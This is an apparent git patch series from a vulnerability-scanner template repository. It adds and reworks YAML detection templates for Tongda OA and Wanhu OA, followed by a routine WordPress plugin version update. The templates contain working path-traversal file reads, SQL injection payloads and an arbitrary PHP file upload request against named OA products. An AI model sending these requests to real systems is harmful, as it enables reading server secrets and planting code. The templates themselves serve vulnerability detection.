通达OA v2017 video_file.php文件存在任意文件下载漏洞,攻击者通过漏洞可以读取服务器敏感文件 - reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html - tags: tongda,oa,info - -http: - - raw: - - | - GET /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php HTTP/1.1 - Host: {{Hostname}} - - - matchers-condition: and - matchers: - - type: word - words: - - "$ROOT_PATH" - - type: word - words: - - "$ATTACH_PATH" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/tongda/tongda-report-bi-func-sqli.yaml b/http/vulnerabilities/tongda/tongda-report-bi-func-sqli.yaml new file mode 100755 index 0000000000..94fc9237f2 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-report-bi-func-sqli.yaml @@ -0,0 +1,36 @@ +id: tongda-report-bi-func-sqli + +info: + name: Tongda OA v11.6 report_bi.func.php - SQL injection + author: SleepingBag945 + severity: high + description: | + Tongda OA v11.6 report_bi.func.php has a SQL injection vulnerability, and attackers can obtain database information through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20report_bi.func.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="TDXK-通达OA" + verified: true + tags: tongda,sqli + +http: + - raw: + - | + POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info& + + matchers-condition: and + matchers: + - type: word + words: + - "root@" + - "para" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-oa-v2017-action-upload-arbitrary-file-upload.yaml b/http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml similarity index 64% rename from http/vulnerabilities/tongda/tongda-oa-v2017-action-upload-arbitrary-file-upload.yaml rename to http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml index b963b3a783..bf8a174e26 100755 --- a/http/vulnerabilities/tongda/tongda-oa-v2017-action-upload-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml @@ -1,20 +1,25 @@ -id: tongda-oa-v2017-action-upload-arbitrary-file-upload +id: tongda-v2017-action-uploadfile info: - name: tongda-oa-v2017-action-upload-arbitrary-file-upload + name: Tongda OA v2017 action_upload.php - Arbitrary File Upload author: SleepingBag945 severity: critical - description: 通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞 + description: | + Tongda OA v2017 action_upload.php file filtering is insufficient and does not require background permissions, resulting in arbitrary file upload vulnerabilities reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html - tags: tongda,oa,info + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20action_upload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md + - https://github.com/shadow1ng/fscan/blob/main/WebScan/pocs/tongda-v2017-uploadfile.yml + metadata: + max-request: 1 + fofa-query: app="TDXK-通达OA" + verified: true + tags: tongda,fileupload http: - raw: - | POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjhddzlqp X_requested_with: XMLHttpRequest Accept-Encoding: gzip @@ -30,7 +35,7 @@ http: ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="CONFIG[filePathFormat]" - {{randstr_1}} + {{randstr}} ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]" @@ -46,9 +51,8 @@ http: submit ------WebKitFormBoundaryjhddzlqp-- - - raw: - | - GET {{randstr_1}}.php HTTP/1.1 + GET {{randstr}}.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and @@ -56,6 +60,7 @@ http: - type: word words: - "1f18933ca1e531c1eac9cccc4952a03b" + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-v2017-video-file-read.yaml b/http/vulnerabilities/tongda/tongda-v2017-video-file-read.yaml new file mode 100755 index 0000000000..9a5a0473d8 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-v2017-video-file-read.yaml @@ -0,0 +1,31 @@ +id: tongda-v2017-video-file-read + +info: + name: Tongda OA V2017 Video File - Arbitrary File Read + author: SleepingBag945 + severity: medium + description: | + There is an arbitrary file reading vulnerability in Extreme OA video_file.php. An attacker can obtain sensitive files on the server through the vulnerability. + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html + metadata: + max-request: 1 + fofa-query: icon_hash="1967132225" + verified: true + tags: tongda,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php" + + matchers-condition: and + matchers: + - type: word + words: + - "$ROOT_PATH" + - "$ATTACH_PATH" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml b/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml new file mode 100755 index 0000000000..8ce4356906 --- /dev/null +++ b/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml @@ -0,0 +1,31 @@ +id: wanhu-documentedit-sqli + +info: + name: WanhuOA DocumentEdit.jsp - SQL Injection + author: SleepingBag945 + severity: high + description: | + The Wanhu OA DocumentEdit.jsp file has a SQL injection vulnerability. An attacker can perform SQL injection into the database by sending a special request package and obtain sensitive information on the server. + reference: + - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20DocumentEdit.jsp%20SQL注入漏洞.html + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DocumentEdit.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + verified: true + fofa-query: app="万户网络-ezOFFICE" + tags: wanhu,sqli + +http: + - raw: + - | + GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:5'-- HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'status_code == 200' + - 'contains(body, "iSignature HTML V6")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/wanhu/wanhu-download-ftp-file-read.yaml b/http/vulnerabilities/wanhu/wanhu-download-ftp-file-read.yaml new file mode 100755 index 0000000000..c05584dadb --- /dev/null +++ b/http/vulnerabilities/wanhu/wanhu-download-ftp-file-read.yaml @@ -0,0 +1,33 @@ +id: wanhu-download-ftp-file-read +info: + name: Wanhu OA download_ftp.jsp - Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + There is an arbitrary file download vulnerability in the Wanhu OA download_ftp.jsp file. An attacker can download any file on the server through the vulnerability. + reference: + - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_ftp.jsp%20任意文件下载漏洞.html + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/wanhu-oa-download-ftp-file-read.yaml + metadata: + max-request: 1 + fofa-query: app="万户网络-ezOFFICE" + verified: true + tags: wanhu,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml" + + matchers-condition: and + matchers: + - type: word + words: + - "<?xml version=" + - "web-app" + - "display-name" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/wanhu/wanhu-download-old-file-read.yaml b/http/vulnerabilities/wanhu/wanhu-download-old-file-read.yaml new file mode 100755 index 0000000000..9eafbaa114 --- /dev/null +++ b/http/vulnerabilities/wanhu/wanhu-download-old-file-read.yaml @@ -0,0 +1,33 @@ +id: wanhu-download-old-file-read +info: + name: Wanhu OA download_old.jsp - Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + There is an arbitrary file download vulnerability in the Wanhu OA download_old.jsp file. An attacker can download any file on the server through the vulnerability. + reference: + - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_old.jsp%20任意文件下载漏洞.html + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/wanhu-oa-download-old-file-read.yaml + metadata: + max-request: 1 + fofa-query: app="万户网络-ezOFFICE" + verified: true + tags: wanhu,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml" + + matchers-condition: and + matchers: + - type: word + words: + - "<?xml version=" + - "web-app" + - "display-name" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/wanhu/wanhu-oa-documentedit-sqli.yaml b/http/vulnerabilities/wanhu/wanhu-oa-documentedit-sqli.yaml deleted file mode 100755 index 25399c455c..0000000000 --- a/http/vulnerabilities/wanhu/wanhu-oa-documentedit-sqli.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: wanhu-oa-documentedit-sqli - -info: - name: wanhu-oa-documentedit-sqli - author: SleepingBag945 - severity: high - description: 万户Ezoffice系统是一套基于jsp的oa系统,该系统基于J2EE架构技术的三层架构,完全采用B/S体系结构,广泛应用于各个行业。 万户ezOFFICE协同办公系统DocumentEdit.jsp存在SQL注入漏洞。由于'DocumentID'参数缺乏过滤,允许攻击者利用漏洞获取数据库敏感信息。 - reference: - - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20DocumentEdit.jsp%20SQL注入漏洞.html - tags: wanhu,oa,sqli - -http: - - raw: - - | - GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20null,null,%27caqopg%27||%27povurh%27,null,null,null,null,null,null,null%20from%20dual-- HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - matchers-condition: and - matchers: - - type: word - words: - - "HTTP-EQUIV=\"Pragma\"" - - type: word - words: - - "caqopgpovurh" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/wanhu/wanhu-oa-download-ftp-arbitrary-file-read.yaml b/http/vulnerabilities/wanhu/wanhu-oa-download-ftp-arbitrary-file-read.yaml deleted file mode 100755 index 493655e857..0000000000 --- a/http/vulnerabilities/wanhu/wanhu-oa-download-ftp-arbitrary-file-read.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: wanhu-oa-download-ftp-arbitrary-file-read -info: - name: wanhu-oa-download-ftp-arbitrary-file-read - author: SleepingBag945 - severity: high - description: 万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件 - reference: - - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_ftp.jsp%20任意文件下载漏洞.html - tags: wanhu,oa - -http: - - raw: - - | - GET /defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - matchers-condition: and - matchers: - - type: word - words: - - "<?xml version=" - - type: word - words: - - "DOCTYPE" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/wanhu/wanhu-oa-download-old-arbitrary-file-read.yaml b/http/vulnerabilities/wanhu/wanhu-oa-download-old-arbitrary-file-read.yaml deleted file mode 100755 index 36e47024b9..0000000000 --- a/http/vulnerabilities/wanhu/wanhu-oa-download-old-arbitrary-file-read.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: wanhu-oa-download-old-arbitrary-file-read -info: - name: wanhu-oa-download-old-arbitrary-file-read - author: SleepingBag945 - severity: high - description: 万户OA download_old.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件 - reference: - - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_old.jsp%20任意文件下载漏洞.html - tags: wanhu,oa - -http: - - raw: - - | - GET /defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - matchers-condition: and - matchers: - - type: word - words: - - "<?xml version=" - - type: word - words: - - "DOCTYPE" - - type: status - status: - - 200 From 8f6ad4e1d5a94a5599e2e334eba4b858559df480 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 7 Sep 2023 04:02:14 +0000 Subject: [PATCH 0208/1090] Auto WordPress Plugins Update [Thu Sep 7 04:02:14 UTC 2023] :robot: --- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/host-webfonts-local.txt | 2 +- helpers/wordpress/plugins/ocean-extra.txt | 2 +- helpers/wordpress/plugins/seo-by-rank-math.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 205 files changed, 5 insertions(+), 205 deletions(-) diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 075be6e295..fe194a2640 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -16.5.1 \ No newline at end of file +16.6.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/host-webfonts-local.txt b/helpers/wordpress/plugins/host-webfonts-local.txt index 262122f679..722fb619ce 100644 --- a/helpers/wordpress/plugins/host-webfonts-local.txt +++ b/helpers/wordpress/plugins/host-webfonts-local.txt @@ -1 +1 @@ -5.7.1 \ No newline at end of file +5.7.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ocean-extra.txt b/helpers/wordpress/plugins/ocean-extra.txt index b370e25daa..e3a4f19336 100644 --- a/helpers/wordpress/plugins/ocean-extra.txt +++ b/helpers/wordpress/plugins/ocean-extra.txt @@ -1 +1 @@ -2.1.8 \ No newline at end of file +2.2.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index 7485f28894..c811a9aec4 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.122 \ No newline at end of file +1.0.201 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index f9da12e118..306894a15e 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -6.3.2 \ No newline at end of file +6.4.1 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml 